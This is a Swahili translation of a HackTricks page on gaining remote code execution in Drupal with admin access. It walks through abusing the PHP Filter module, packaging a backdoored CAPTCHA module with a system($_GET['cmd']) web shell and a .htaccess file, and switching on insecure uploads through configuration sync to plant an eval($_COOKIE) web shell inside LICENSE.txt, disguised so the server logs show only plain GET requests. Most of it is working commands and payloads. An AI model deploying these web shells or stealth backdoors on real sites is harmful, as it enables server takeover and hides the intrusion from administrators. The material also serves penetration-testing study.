Swahili - Ht
HackTricks Training Twitter Linkedin Sponsor

Drupal RCE

Support HackTricks

With PHP Filter Module

Katika toleo za zamani za Drupal (kabla ya toleo la 8), ilikuwa inawezekana kuingia kama admin na kuwezesha moduli ya PHP filter, ambayo "Inaruhusu msimbo wa PHP uliowekwa ndani/kipande kutathminiwa." Lakini kuanzia toleo la 8 moduli hii haijaanzishwa kwa chaguo-msingi.

Unahitaji plugin ya php iwe imewekwa (angalia kwa kufikia /modules/php na ikiwa inarudisha 403 basi, ipo, ikiwa haipatikani, basi plugin ya php haijaanzishwa)

Nenda kwa Modules -> (Angalia) PHP Filter -> Hifadhi usanidi

Kisha bonyeza Ongeza maudhui -> Chagua Ukurasa wa Msingi au Kifungu -> Andika php shellcode kwenye mwili -> Chagua PHP code katika Muundo wa maandiko -> Chagua Tazama

Hatimaye, fikia node mpya iliyoundwa:

curl http://drupal-site.local/node/3

Install PHP Filter Module

Katika toleo za sasa si tena inawezekana kufunga plugins kwa kuwa na ufikiaji wa wavuti tu baada ya usakinishaji wa default.

Kuanzia toleo 8 na kuendelea, PHP Filter moduli haifungwi kwa default. Ili kutumia kazi hii, itabidi tufunge moduli wenyewe.

  1. Pakua toleo la hivi karibuni la moduli kutoka tovuti ya Drupal.

  2. wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz

  3. Mara baada ya kupakua, nenda kwenye Administration > Reports > Available updates.

  4. Bonyeza Browse, chagua faili kutoka kwenye directory tuliyopakia, kisha bonyeza Install.

  5. Mara moduli ikishafungwa, tunaweza kubonyeza Content na kuunda ukurasa mpya wa msingi, kama tulivyofanya katika mfano wa Drupal 7. Tena, hakikisha uchague PHP code kutoka kwenye Text format dropdown.

Backdoored Module

Katika toleo za sasa si tena inawezekana kufunga plugins kwa kuwa na ufikiaji wa wavuti tu baada ya usakinishaji wa default.

Moduli yenye backdoor inaweza kuundwa kwa kuongeza shell kwenye moduli iliyopo. Moduli zinaweza kupatikana kwenye tovuti ya drupal.org. Hebu chague moduli kama CAPTCHA. Shuka chini na nakili kiungo cha tar.gz archive.

  • Pakua archive na uondoe yaliyomo yake.

wget --no-check-certificate  https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz

  • Tengeneza PHP web shell yenye maudhui:

<?php
system($_GET["cmd"]);
?>

  • Next, we need to create a .htaccess file to give ourselves access to the folder. This is necessary as Drupal denies direct access to the /modules folder.

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>

  • Mipangilio iliyo juu itatumika kwa sheria za / folda tunapohitaji faili katika /modules. Nakili faili hizi mbili kwenye folda ya captcha na uunde archive.

mv shell.php .htaccess captcha
tar cvf captcha.tar.gz captcha/

  • Ikiwa tuna ufikiaji wa kiutawala kwenye tovuti, bonyeza Manage kisha Extend kwenye upande wa menyu. Kisha, bonyeza kitufe cha + Install new module, na tutapelekwa kwenye ukurasa wa usakinishaji, kama http://drupal-site.local/admin/modules/install Tembelea archive ya Captcha iliyokuwa na backdoor na bonyeza Install.

  • Mara baada ya usakinishaji kufanikiwa, tembelea /modules/captcha/shell.php ili kutekeleza amri.

Backdooring Drupal kwa kutumia Usawazishaji wa Mipangilio

Post iliyoshirikiwa na Coiffeur0x90

Sehemu ya 1 (kuanzisha Media na Media Library)

Katika menyu ya Extend (/admin/modules), unaweza kuanzisha kile kinachoweza kuonekana kama plugins ambazo tayari zimesakinishwa. Kwa kawaida, plugins Media na Media Library hazionekani kuanzishwa, hivyo hebu tuzianzishe.

Kabla ya kuanzisha:

Baada ya kuanzisha:

Sehemu ya 2 (kutumia kipengele Usawazishaji wa Mipangilio)

Tutatumia kipengele Usawazishaji wa Mipangilio kutupa (kuhamasisha) na kupakia (kuagiza) entries za mipangilio ya Drupal:

  • /admin/config/development/configuration/single/export

  • /admin/config/development/configuration/single/import

Patch system.file.yml

Hebu tuanze kwa kupatch entry ya kwanza allow_insecure_uploads kutoka:

File: system.file.yml


...

allow_insecure_uploads: false

...

Kwa:

File: system.file.yml


...

allow_insecure_uploads: true

...

Patch field.field.media.document.field_media_document.yml

Kisha, pata kipengele cha pili file_extensions kutoka:

File: field.field.media.document.field_media_document.yml


...

file_directory: '[date:custom:Y]-[date:custom:m]'
file_extensions: 'txt rtf doc docx ppt pptx xls xlsx pdf odf odg odp ods odt fodt fods fodp fodg key numbers pages'

...

Ili:

Faili: field.field.media.document.field_media_document.yml

...

file_directory: '[date:custom:Y]-[date:custom:m]'
file_extensions: 'htaccess txt rtf doc docx ppt pptx xls xlsx pdf odf odg odp ods odt fodt fods fodp fodg key numbers pages'

...

Sijatumia katika blogu hii lakini inabainishwa kuwa inawezekana kufafanua kiingilio file_directory kwa njia yoyote na kwamba ina udhaifu wa shambulio la path traversal (hivyo tunaweza kurudi juu ndani ya mti wa mfumo wa faili wa Drupal).

Sehemu ya 3 (kutumia kipengele Ongeza Hati)

Hatua ya mwisho ni rahisi zaidi, na imegawanywa katika hatua ndogo mbili. Ya kwanza ni kupakia faili katika muundo wa .htaccess ili kutumia maagizo ya Apache na kuruhusu faili za .txt kutafsiriwa na injini ya PHP. Ya pili ni kupakia faili ya .txt inayoshikilia mzigo wetu.

Faili: .htaccess

<Files *>
SetHandler application/x-httpd-php
</Files>

# Vroum! Vroum!
# We reactivate PHP engines for all versions in order to be targetless.
<IfModule mod_php.c>
php_flag engine on
</IfModule>
<IfModule mod_php7.c>
php_flag engine on
</IfModule>
<IfModule mod_php5.c>
php_flag engine on
</IfModule>

Kwa nini hila hii ni nzuri?

Kwa sababu mara tu Webshell (ambayo tutaita LICENSE.txt) inapowekwa kwenye seva ya Mtandao, tunaweza kuhamasisha amri zetu kupitia $_COOKIE na katika kumbukumbu za seva ya Mtandao, hii itaonekana kama ombi halali la GET kwa faili la maandiko.

Kwa nini kuita Webshell yetu LICENSE.txt?

Kwa sababu tu ikiwa tutachukua faili ifuatayo, kwa mfano core/LICENSE.txt (ambayo tayari ipo katika msingi wa Drupal), tuna faili ya mistari 339 na ukubwa wa 17.6 KB, ambayo ni bora kwa kuongeza kipande kidogo cha msimbo wa PHP katikati (kwa sababu faili ni kubwa vya kutosha).

Faili: LICENSE.txt iliyorekebishwa


...

this License, you may choose any version ever published by the Free Software
Foundation.

<?php

# We inject our payload into the cookies so that in the logs of the compromised
# server it shows up as having been requested via the GET method, in order to
# avoid raising suspicions.
if (isset($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"])) {
if (!empty($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"])) {
eval($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"]);
} else {
phpinfo();
}
}

?>

10. If you wish to incorporate parts of the Program into other free
programs whose distribution conditions are different, write to the author

...

Sehemu ya 3.1 (pakia faili .htaccess)

Kwanza, tunatumia kipengele Add Document (/media/add/document) kupakia faili yetu inayokuwa na maagizo ya Apache (.htaccess).

Sehemu ya 3.2 (pakia faili LICENSE.txt)

Kisha, tunatumia tena kipengele Add Document (/media/add/document) kupakia Webshell iliyofichwa ndani ya faili la leseni.

Sehemu ya 4 (mawasiliano na Webshell)

Sehemu ya mwisho inahusisha mawasiliano na Webshell.

Kama inavyoonyeshwa katika picha ifuatayo, ikiwa cookie inayotarajiwa na Webshell yetu haijafafanuliwa, tunapata matokeo yafuatayo tunaposhughulikia faili kupitia kivinjari cha wavuti.

Wakati mshambuliaji anapoweka cookie, anaweza kuwasiliana na Webshell na kutekeleza amri zozote anazotaka.

Na kama unavyoona katika kumbukumbu, inaonekana kama faili ya txt pekee ndiyo imeombwa.

Asante kwa kuchukua muda kusoma makala hii, natumai itakusaidia kupata baadhi ya shells.

Support HackTricks
PreviousDrupalNextElectron Desktop Apps

Last updated